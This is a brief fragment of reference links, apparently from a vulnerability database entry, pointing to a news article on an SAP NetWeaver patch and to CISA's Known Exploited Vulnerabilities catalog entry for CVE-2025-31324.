https://www.theregister.com/2025/04/25/sap_netweaver_patch/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31324 |